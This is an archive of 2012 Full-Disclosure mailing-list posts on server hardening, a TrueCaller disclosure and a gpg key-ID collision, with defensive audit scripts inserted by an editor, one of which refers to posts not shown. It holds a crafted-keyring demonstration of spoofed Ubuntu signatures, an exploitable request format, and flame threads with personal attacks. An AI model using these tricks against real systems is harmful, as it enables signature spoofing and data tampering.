>>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote:
>>>> Hello:
>>>> I have a couple questions. First, I'll explain what I did:
>>>> 1) I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags).
>>>> 2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk.
>>>> 3) I installed aid.
>>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>>> This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended?
>>>> Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc. What kind of preventative measures exist for this?
>>>>
>>>> --
>>>> Take care,
>>>> Ty
>>>> http://tds-solutions.net
>>>> The aspen project: a barebones light-weight mud engine: http://code.google.com/p/aspenmud
>>>> He that will not reason is a bigot; he that cannot reason is a fool; he that dares not reason is a slave.
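As an added illustration, not code from the thread or from any of its posters, the following sh script audits an sshd_config for the settings Tyler lists (root login blocked, only the sshusers group allowed, key-only authentication) and reports, without failing, whether the daemon still sits on port 22, the point Alex and Rob argue over. The function names and file paths are mine, and the two sample configs it writes are constructed so the audit can be tried offline.

```shell
# Added example (not code from the thread): audit an sshd_config for the
# settings Tyler describes (no root login, sshusers group only, key-only
# auth) and the port move Alex suggests. Function and file names are mine.

# sshd_value FILE KEYWORD: print the value sshd will use for KEYWORD.
# sshd takes the first uncommented occurrence of a keyword, so we do too.
sshd_value() {
    awk -v key="$2" '
        /^[[:space:]]*#/ { next }                     # skip comment lines
        tolower($1) == tolower(key) { print $2; exit }
    ' "$1"
}

# audit_sshd FILE: print FAIL/NOTE lines, return 1 if any hardening check fails.
audit_sshd() {
    cfg="$1"
    fail=0

    # Root login: OpenSSH of this era defaults to "yes", so unset counts as a failure.
    v=$(sshd_value "$cfg" PermitRootLogin)
    [ "$v" = "no" ] || { echo "FAIL: PermitRootLogin is '${v:-unset}', expected no"; fail=1; }

    # Key-only authentication: passwords off, public keys on (default yes).
    v=$(sshd_value "$cfg" PasswordAuthentication)
    [ "$v" = "no" ] || { echo "FAIL: PasswordAuthentication is '${v:-unset}', expected no"; fail=1; }
    v=$(sshd_value "$cfg" PubkeyAuthentication)
    [ "${v:-yes}" = "yes" ] || { echo "FAIL: PubkeyAuthentication is '$v', expected yes"; fail=1; }

    # Group restriction, as in "only users in the sshusers group can connect".
    v=$(sshd_value "$cfg" AllowGroups)
    [ -n "$v" ] || { echo "FAIL: no AllowGroups restriction"; fail=1; }

    # Non-default port: as Rob notes, this removes noise rather than
    # vulnerabilities, so it is reported as a note, not a failure.
    v=$(sshd_value "$cfg" Port)
    if [ -z "$v" ] || [ "$v" = "22" ]; then
        echo "NOTE: sshd on default port 22"
    fi
    return $fail
}

# Constructed sample configs (not from the thread) so the audit can be tried offline.
write_samples() {
    dir=$(mktemp -d)
    cat > "$dir/hardened.conf" <<'EOF'
# constructed: the setup Tyler describes
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowGroups sshusers
EOF
    cat > "$dir/default.conf" <<'EOF'
# constructed: stock-like config, root and password logins still allowed
Port 22
#PermitRootLogin no
PasswordAuthentication yes
EOF
    echo "$dir"
}

# Stand-alone run over both constructed configs.
samples=$(write_samples)
for f in hardened default; do
    echo "== $f.conf"
    audit_sshd "$samples/$f.conf" && echo "OK: all checks passed"
done
```

Point `audit_sshd` at the real `/etc/ssh/sshd_config` to check a live host; the commented-out `#PermitRootLogin no` in the stock-like sample is there deliberately, since a commented directive is the classic way an unhardened default survives a review.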
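For Tyler's closing question about requests scanning for common URLs, an added example that is not from the thread: an awk pass over a combined-format access log that counts, per client, requests for paths that belong to applications the server does not host (wordpress, phpbb3 and similar) and reports clients over a threshold. The log lines are constructed, using RFC 5737 documentation addresses, and the probe path list and threshold are assumptions to be tuned to the site.

```shell
# Added example (not code from the thread): flag clients that probe for the
# common application paths Tyler mentions (wordpress, phpbb3 and the like)
# in a combined-format access log. The probe list and threshold are assumptions.

# Paths a legitimate visitor of a site without these apps never requests.
# Prefix match on the request path with the query string removed.
PROBE_PATHS='^/(wp-login[.]php|wp-admin|wordpress|phpbb3|phpmyadmin|pma|xmlrpc[.]php)'

# probe_hits LOGFILE [THRESHOLD]: print "count ip" for clients with at least
# THRESHOLD (default 3) probe requests, most active first.
probe_hits() {
    awk -v re="$PROBE_PATHS" -v thr="${2:-3}" '
        {
            # combined log: ip ident user [time zone] "METHOD path proto" status ...
            path = $7
            sub(/\?.*/, "", path)           # drop the query string
            if (path ~ re) hits[$1]++
        }
        END {
            for (ip in hits) if (hits[ip] >= thr) print hits[ip], ip
        }
    ' "$1" | sort -rn
}

# Constructed log (RFC 5737 documentation addresses, not real traffic):
# one noisy scanner, one low-volume prober, one ordinary visitor.
write_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
198.51.100.7 - - [21/Jun/2012:08:52:01 +0000] "GET /wp-login.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jun/2012:08:52:02 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jun/2012:08:52:03 +0000] "GET /phpbb3/ucp.php?mode=login HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jun/2012:08:52:04 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Jun/2012:09:00:00 +0000] "GET /xmlrpc.php HTTP/1.1" 404 162 "-" "curl/7.21"
203.0.113.5 - - [21/Jun/2012:09:00:01 +0000] "GET /pma/ HTTP/1.1" 404 162 "-" "curl/7.21"
192.0.2.10 - - [21/Jun/2012:09:05:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Jun/2012:09:05:03 +0000] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Stand-alone run over the constructed log.
log=$(write_sample_log)
echo "clients with >= 3 probe requests:"
probe_hits "$log" 3
```

The output is a list of "count ip" pairs that can be fed to whatever blocking mechanism the host already has (an iptables rule, or a fail2ban jail built around the same regular expression); keep the threshold above one so that a single stray 404 from a real visitor never gets them blocked.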
Re: [Full-disclosure] www.LEORAT.com is scam
Hey man, that's some serious shit there - it's not a letter, it's a "legal letter." Those are more letter than the normal letter. Be afraid!

t

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of coderman
Sent: Tuesday, June 19, 2012 2:36 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] www.LEORAT.com is scam

> On Tue, Jun 19, 2012 at 2:05 AM, Fyodor fyo...@insecure.org wrote:
>> From: Leo Impact Security,Inc cont...@leoimpact.com
>> To: fyo...@insecure.org
>> Subject: subject: http://seclists.org/fulldisclosure/2012/Apr/19 removing
>> ...
>> I am Mark, CISO of Leo Impact Security, some fraud person post illigmate post so please remove asap else we hire a lawer to send legal letter on your site.
>
> is this how n3td3v is paying for intarwebs? :o
Re: [Full-disclosure] Using second gpg keyring may be misleading?
Ah... Very interesting. Another example where default trust can be a bad thing (as we saw with Flame).

Sent from my iPad

On Jun 15, 2012, at 6:43 AM, Georgi Guninski gunin...@guninski.com wrote:
> On Thu, Jun 14, 2012 at 05:52:26PM +, Thor (Hammer of God) wrote:
>> What are you considering exploitable? The untrusted/unverified Master key?
>
> ubuntu fixed this out of paranoia:
> https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-June/001721.html
>
> "While it appears that a man-in-the-middle attacker cannot exploit this, as a hardening measure this update adjusts apt-key to validate all subkeys when checking for key collisions."
>
> i would suppose this was exploitable while it was alive.
Re: [Full-disclosure] free speech - 9 yro bloggers are dangerous
As if haggis wasn't distressing enough...

Sent from my iPad

On Jun 15, 2012, at 5:00 AM, Georgi Guninski gunin...@guninski.com wrote:
> http://www.theregister.co.uk/2012/06/15/nine_year_old_school_dinner_blog_inaccurate/
>
> "Scots council: 9-yr-old lunch blogger was causing 'distress and harm'"
>
> "A Scottish council have said that a nine-year-old food blogger was misrepresenting her school dinners and distressing the canteen staff, by publishing a photoblog about her lunch."
>
> the blog is at: http://neverseconds.blogspot.co.uk/
Re: [Full-disclosure] Using second gpg keyring may be misleading?
What are you considering exploitable? The untrusted/unverified Master key?

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski
Sent: Thursday, June 14, 2012 7:18 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Using second gpg keyring may be misleading?

> There is a chance someone exploits this in apt-key...
>
> Attached is a keyring and here is the output:
>
> $ rm -rf /home/joro2/.gnupg/ ; gpg --import /usr/share/keyrings/ubuntu-master-keyring.gpg ; gpg --check-sigs --keyring /tmp/sec3
> gpg: imported: 1 (RSA: 1)
> gpg: no ultimately trusted keys found
> /home/joro2/.gnupg/pubring.gpg
> --
> pub   4096R/3F272F5B 2007-11-09
> uid                  Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com
> sig!3        3F272F5B 2007-11-09  Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com
>
> /tmp/sec3
> -
> pub   1024R/B1C08810 2012-06-14
> uid                  kkk5 k@k
> sig!3        B1C08810 2012-06-14  [User ID not found]
> sig!         3F272F5B 2012-06-14  Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com
> sig!         3F272F5B 2012-06-14  Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com
> sub   1024R/0354AE88 2012-06-14
> sig!         B1C08810 2012-06-14  [User ID not found]
> sub   2179R/3F272F5B 2012-06-14
> sig!         B1C08810 2012-06-14  [User ID not found]
>
> 1 signature not checked due to a missing key
>
> $ rm -rf /home/joro2/.gnupg/ ; gpg --import /usr/share/keyrings/ubuntu-master-keyring.gpg ; gpg --no-default-keyring --check-sigs --keyring /tmp/sec3
> gpg: Total number processed: 1
> gpg: imported: 1 (RSA: 1)
> gpg: no ultimately trusted keys found
> /tmp/sec3
> -
> pub   1024R/B1C08810 2012-06-14
> uid                  kkk5 k@k
> sig!3        B1C08810 2012-06-14  kkk5 k@k
> sig!         3F272F5B 2012-06-14  kkk5 k@k
> sig!         3F272F5B 2012-06-14  kkk5 k@k
> sub   1024R/0354AE88 2012-06-14
> sig!         B1C08810 2012-06-14  kkk5 k@k
> sub   2179R/3F272F5B 2012-06-14
> sig!         B1C08810 2012-06-14  kkk5 k@k
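Georgi's two listings show the mechanism: the attached keyring's 2179-bit subkey carries the same 8-hex key ID (3F272F5B) as the Ubuntu master key, so when the default keyring is also loaded gpg resolves that ID to the master key's user ID and labels the subkey's signatures "Ubuntu Archive Master Signing Key"; with --no-default-keyring the same signatures are shown as coming from kkk5. The Ubuntu announcement quoted in the follow-up message on this page describes the defensive check (apt-key now validates all subkeys when checking for key collisions). As an added example, not code from the thread or from apt-key, the following sh/awk script performs that check over `gpg --with-colons --list-keys` output: it collects the trusted keyring's primary key IDs and reports any pub or sub record in a candidate listing whose short ID (last eight hex digits) matches. Both listings are constructed; only the short IDs and key sizes come from the thread, and the leading hex digits and the user IDs are placeholders.

```shell
# Added example: key-ID collision check over `gpg --with-colons --list-keys`
# output. Not from the thread or from apt-key; written to mirror the
# "validate all subkeys when checking for key collisions" hardening.
# Colon-format fields used: $1 record type (pub/sub), $3 key length,
# $5 long (16 hex digit) key ID.

# Constructed listing of the trusted keyring. Only the short ID 3F272F5B
# comes from the thread; the leading digits and the uid are placeholders.
trusted_listing() {
    cat <<'EOF'
pub:-:4096:1:AAAAAAAA3F272F5B:2007-11-09:::-:::scSC:
uid:-::::2007-11-09::PLACEHOLDERHASH::Ubuntu Archive Master Signing Key:
EOF
}

# Constructed listing of the keyring Georgi attached (/tmp/sec3 in the thread):
# a 1024-bit primary key and two subkeys, one of them 2179-bit with a short
# ID that collides with the trusted master key.
candidate_listing() {
    cat <<'EOF'
pub:-:1024:1:CCCCCCCCB1C08810:2012-06-14:::-:::scSC:
uid:-::::2012-06-14::PLACEHOLDERHASH::kkk5 <k@k>:
sub:-:1024:1:DDDDDDDD0354AE88:2012-06-14::::::e:
sub:-:2179:1:BBBBBBBB3F272F5B:2012-06-14::::::s:
EOF
}

# keyid_collisions TRUSTED_FILE CANDIDATE_FILE
# Prints one COLLISION line per pub/sub record in CANDIDATE_FILE whose short
# key ID matches a primary key in TRUSTED_FILE; exit status 1 if any found.
keyid_collisions() {
    out=$(awk -F: '
        # first file: remember every primary key by its short (last 8 hex) ID
        NR == FNR { if ($1 == "pub") trusted[substr($5, 9)] = $5; next }
        # second file: check primary keys AND subkeys, which is the whole point
        $1 == "pub" || $1 == "sub" {
            short = substr($5, 9)
            if (short in trusted)
                printf "COLLISION: %s:%s (%s-bit) short ID %s matches trusted pub %s\n",
                       $1, $5, $3, short, trusted[short]
        }' "$1" "$2")
    [ -z "$out" ] && return 0
    printf '%s\n' "$out"
    return 1
}

# Stand-alone run over the constructed listings.
demo() {
    t=$(mktemp); c=$(mktemp)
    trusted_listing > "$t"
    candidate_listing > "$c"
    keyid_collisions "$t" "$c"
    rc=$?
    rm -f "$t" "$c"
    return $rc
}

if demo; then echo "no key-ID collisions"; else echo "collision(s) found, do not merge keyrings"; fi
```

Against real keyrings, generate the two inputs with `gpg --no-default-keyring --keyring FILE --with-colons --list-keys` and run `keyid_collisions` on them before adding a key to a trusted keyring; comparing on the 32-bit short ID is what makes the check catch the case in the thread, where the long IDs differ.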
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
And not capitalizing "Army" when you claim to have spent 10 years of your life in service does precisely the same thing.

On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.org wrote:
> I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
OK, I'll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can't consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your "right" to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don't need your service dates, but it will help. All I need do is fax over form SF-180, and they'll verify your service. If you really did serve, I'll apologize publically. If you didn't (or don't provide the information) then we'll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough?

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai
Sent: Sunday, June 10, 2012 2:00 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote:
>> And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing.
>>
>> On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.org wrote:
>>> I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously.
>
> Except i don't like the government.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Awesome. I'll send 'er off. "Andrew Wallace," correct?

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: Laurelai [mailto:laure...@oneechan.org]
Sent: Sunday, June 10, 2012 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

> On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>> OK, I'll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can't consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your "right" to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don't need your service dates, but it will help. All I need do is fax over form SF-180, and they'll verify your service. If you really did serve, I'll apologize publically. If you didn't (or don't provide the information) then we'll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough?
>>
>> Timothy "Thor" Mullen
>> www.hammerofgod.com
>> Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
>>
>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai
>> Sent: Sunday, June 10, 2012 2:00 PM
>> To: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
>>
>>> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote:
>>>> And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing.
>>>>
>>>> On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.org wrote:
>>>>> I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously.
>>>
>>> Except i don't like the government.
>
> I went to basic in september of 99 and ETS'ed in may of 08. 6 years were national guard, 4 years active duty. i went to basic at FT. Jackson South Carolina, the base has a lot of fire ants and the weather was a bit unpredictable. My drill sergeant's names were Drill Sergeant Hunter and Drill Sergeant Wachowski. The unit i ETS'ed from was HHB 4/5 ADA out of camp carrol South Korea, and right before i left korea our CSM was relieved of duty (CSM Larkin) for sexually harassing junior enlisted soldiers under his command. I worked in the S-6 shop in a 25B slot for a long time even though i had been trained as a 14E (patriot systems operator and maintainer). I went to echo school at FT. Bliss and let me tell you when I got there I thought the place was just terrible, but there is nothing like the view of watching the sun set against those desert mountains, absolutely beautiful. While I was in South Korea I met up with hubris from backtrace security believe it or not since he was in the area at the time (this was before there ever was a backtrace security); he showed me all the fun places to hang out away from the tourist traps and he has seen me in uniform. So stick that in your pipe and smoke it.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Well no freaking wonder then. For whatever reason, I keep thinking you are Andrew posting under a different name, which always confused me. I know Andrew didn't serve in the Army, which just made me think he was losing his mind. (I've actually never had a problem with Andrew, though I guess many here have.) So yes, my apologies, as I obviously don't know you from Adam. Now everything makes more sense.

T

Sent from my iPad

On Jun 10, 2012, at 4:21 PM, Laurelai laure...@oneechan.org wrote:
> On 6/10/12 6:00 PM, Thor (Hammer of God) wrote:
>> Awesome. I’ll send ‘er off. “Andrew Wallace,” correct?
>>
>> Timothy “Thor” Mullen
>> www.hammerofgod.com
>> Thor’s Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
>>
>> From: Laurelai [mailto:laure...@oneechan.org]
>> Sent: Sunday, June 10, 2012 2:26 PM
>> To: Thor (Hammer of God)
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
>>
>>> On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>>>> OK, I’ll bite this one time. I assert you are blatantly lying about military service. How about tell me your service dates? Surely you can’t consider that any sort of privacy breach. This is an easy way for us to be done with the whole thing. Part of your diatribe is based on your “right” to bitch because of your military service. I, again, assert that is complete fabrication. As someone who actually HAS done work for the government I know (as you should) that your military service records are actually public record. I don’t need your service dates, but it will help. All I need do is fax over form SF-180, and they’ll verify your service. If you really did serve, I’ll apologize publically. If you didn’t (or don’t provide the information) then we’ll all know you are just a lying nutjob and we can ignore you from now on. Is that fair enough?
>>>>
>>>> Timothy “Thor” Mullen
>>>> www.hammerofgod.com
>>>> Thor’s Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
>>>>
>>>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai
>>>> Sent: Sunday, June 10, 2012 2:00 PM
>>>> To: full-disclosure@lists.grok.org.uk
>>>> Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
>>>>
>>>>> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote:
>>>>>> And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing.
>>>>>>
>>>>>> On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.org wrote:
>>>>>>> I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously.
>>>>>
>>>>> Except i don't like the government.
>>>
>>> I went to basic in september of 99 and ETS'ed in may of 08. 6 years were national guard, 4 years active duty. i went to basic at FT. Jackson South Carolina, the base has a lot of fire ants and the weather was a bit unpredictable. My drill sergeant's names were Drill Sergeant Hunter and Drill Sergeant Wachowski. The unit i ETS'ed from was HHB 4/5 ADA out of camp carrol South Korea, and right before i left korea our CSM was relieved of duty (CSM Larkin) for sexually harassing junior enlisted soldiers under his command. I worked in the S-6 shop in a 25B slot for a long time even though i had been trained as a 14E (patriot systems operator and maintainer). I went to echo school at FT. Bliss and let me tell you when I got there I thought the place was just terrible, but there is nothing like the view of watching the sun set against those desert mountains, absolutely beautiful. While I was in South Korea I met up with hubris from backtrace security believe it or not since he was in the area at the time (this was before there ever was a backtrace security); he showed me all the fun places to hang out away from the tourist traps and he has seen me in uniform. So stick that in your pipe and smoke it.
>
> Where the hell did you get that name from lol
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Aw, what's wrong Georgie? Jealous that you can't get out of your has-been status? Not that your self-proclaimed street cred was that much to begin with. :) Shouldn't you be working on finding more articles to post so you can write "M$" and "windoze" like the other posers and substantiate your ego given your little man syndrome? LOL. Oh, that may not be fair. I'm sure you've written books you can point us to. And code too, right? Let's revive those l337 skilz of yours!! Pmsl.

Just kidding, of course. I have nothing but the highest respect for all the good things you've done for the security industry!

t

On Jun 9, 2012, at 12:46 AM, Georgi Guninski gunin...@guninski.com wrote:
> On Fri, Jun 08, 2012 at 05:03:02PM +, Thor (Hammer of God) wrote:
>> Man does things for two reasons: to get laid, or to get paid.
>
> This completely explains why you are on this list. Are you a paid poster or just advertising your leaflet book?
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
+1. I (sometimes regrettably) am from the south. It's quite embarrassing to hear people refer to Sikhs as Muslims in a derogatory fashion (as if there was something wrong with it in the first place) just because they look that way.

t

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible Leaflet

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu
Sent: Saturday, June 09, 2012 12:28 PM
To: Christian Sciberras
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks

> On Sat, 09 Jun 2012 14:25:00 +0200, Christian Sciberras said:
>> Yes, let's just forget Iran would strike any country against its religious views, especially Israel.
>
> I'm personally more worried that US Islamophobia will lead to a first strike than I am that Iran will make a first strike.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
> finding solutions to countries using cyberwar and using innocent peoples machines to carry it out, invading peoples privacy and generally doing terrible stuff in the name of god and country.

What solution? And who exactly is going to find it? The entire history of mankind is based on the terrible stuff we do in the name of god and country. "We," of course, being humans. All we need is one of the two and we've got all the justification we need to go off and kill someone else for having a different god or different country. Note I said "justification" and not "motivation." God and country are just excuses - means to an end. There's always another agenda. Man does things for two reasons: to get laid, or to get paid. Everything else is just a nice fuzzy wrap to make us feel better about ourselves. Finding some other solution is naïve and a waste of time. We, and everyone else, will do whatever we want to do, and do whatever it takes to get away with it. It's as simple as that.

It's easy and convenient for you to bitch about the injustices from behind a keyboard when men and woman are out there DYING for their country and the integrity of what they believe in, irrespective of the basis of the decisions their commanding bodies have for sending them out there. It's called real life. Grow up and go get that bleeding heart sewn up at some free clinic, paid for by the government that has to do the hard work in order to preserve your right to whine about it.

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Laurelai
Sent: Friday, June 08, 2012 9:04 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

> On 6/8/12 11:38 AM, valdis.kletni...@vt.edu wrote:
>> On Thu, 07 Jun 2012 13:48:33 -0400, Ian Hayes said:
>>> On Thu, Jun 7, 2012 at 1:40 PM, andrew.wallace andrew.wall...@rocketmail.com wrote:
>>>> On Tue, Jun 5, 2012 at 8:43 PM, valdis.kletni...@vt.edu wrote:
>>>>> One could equally well read that as "We're fed up and about to pound North Korea even further back into the Stone Age."
>>>>
>>>> With Stuxnet, it was lucky nobody was seriously injured. You cannot condone such weapons Valdis, or your hat will start to turn grey, black.
>>>
>>> Stuxnet may not have killed anyone, but several Iranian nuclear scientists were assassinated in conjunction with Stuxnet's release.
>>
>> Please don't feed the troll - the only way he can post to full-disclosure is if somebody quotes him in.
>>
>> The worst part is that Andrew's reading comprehension is as good as always - I wasn't commenting on Stuxnet, but the move of naval forces to the Pacific. China isn't the only reason we might want a naval task force over there. And I never said I condoned it, merely pointed out alternate interpretations.
>>
>> The funny thing is that Andrew was going on for a *long* time that there is no such thing as cyber-warfare - when in fact it was going on while he was denying it.
>
> I think the real question we should all think on is what are we going to do about this kind of thing? Because the way I see it, the infosec industry is part of this problem until it finds a way to be a part of the solution, if you all even desire this. If you do then lets talk about finding solutions to countries using cyberwar and using innocent peoples machines to carry it out, invading peoples privacy and generally doing terrible stuff in the name of god and country. If you don't then just do us all a favor and stop calling yourself an infosec expert, stop pretending to be one of the good guys and just call yourself a mercenary and realize you are in the same class of people who assassinated civilian scientists for political reasons. I hope all that money helps you sleep at night.
Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details
You can still submit fake data by just adding fake contacts. And of course, the real privacy issue here is that you are sharing your freaking address book with the world. Frankly, I’m amazed anyone would even think about doing that.
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Kuwait WhiteHat Sent: Friday, June 01, 2012 6:30 AM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details
TrueCaller – worldwide number search and spam filter, a top iPhone application in many countries, enables users to search half a billion phone numbers worldwide and much more. The application allows users to search numbers if and only if the user enables the Enhanced Search feature. When enabled, the user is warned that his contacts will be shared with other users to search and his address book is sent to the TrueCaller database.
This process is done by sending the following HTTP “cleartext” request:
post_contact_data=[{"REV":"","FN":"ContactName","TEL_CELL":["MobileNumber"],"TCBID":"Number","FID":"Number","TEL_WORK":["Number"],"TEL_HOME":[],"CONTACT_ID":"3619","LID":""}]
From a security point of view, this is bad security behavior and may lead to one of the following situations:
- Privacy issues
- Fake data
- Enabling the Enhanced Search feature without having to share the user’s address book
Advisory Timeline
28/Apr/2012 – First contact: vulnerability details sent
29/Apr/2012 – Response received: asked for more details
29/Apr/2012 – Second contact: more details provided and TrueCaller's doubts cleared
30/Apr/2012 – Vulnerability confirmed: TrueCaller started working on a fix
01/May/2012 – Vulnerability fixed: fix submitted to Apple for approval
17/May/2012 – New version released: fix approved by Apple and released
01/Jun/2012 – Vulnerability released
Details and more information here: http://q8whitehat.org/truecaller-vulnerability-allows-changing-users-name/
Re: [Full-disclosure] Info about attack trees
Here's the best info on attack trees: http://3.bp.blogspot.com/-P_enGjuZU0I/TxFdFfD1A5I/BKs/DTzpNDG4THc/s1600/ent_isengard_small.jpg
Timothy "Thor" Mullen www.hammerofgod.com Thor's Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Urlan Sent: Friday, May 25, 2012 9:45 AM To: Federico De Meo Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Info about attack trees
Federico, Check this out: http://cwe.mitre.org/top25/
2012/5/25 Federico De Meo ade...@gmail.com
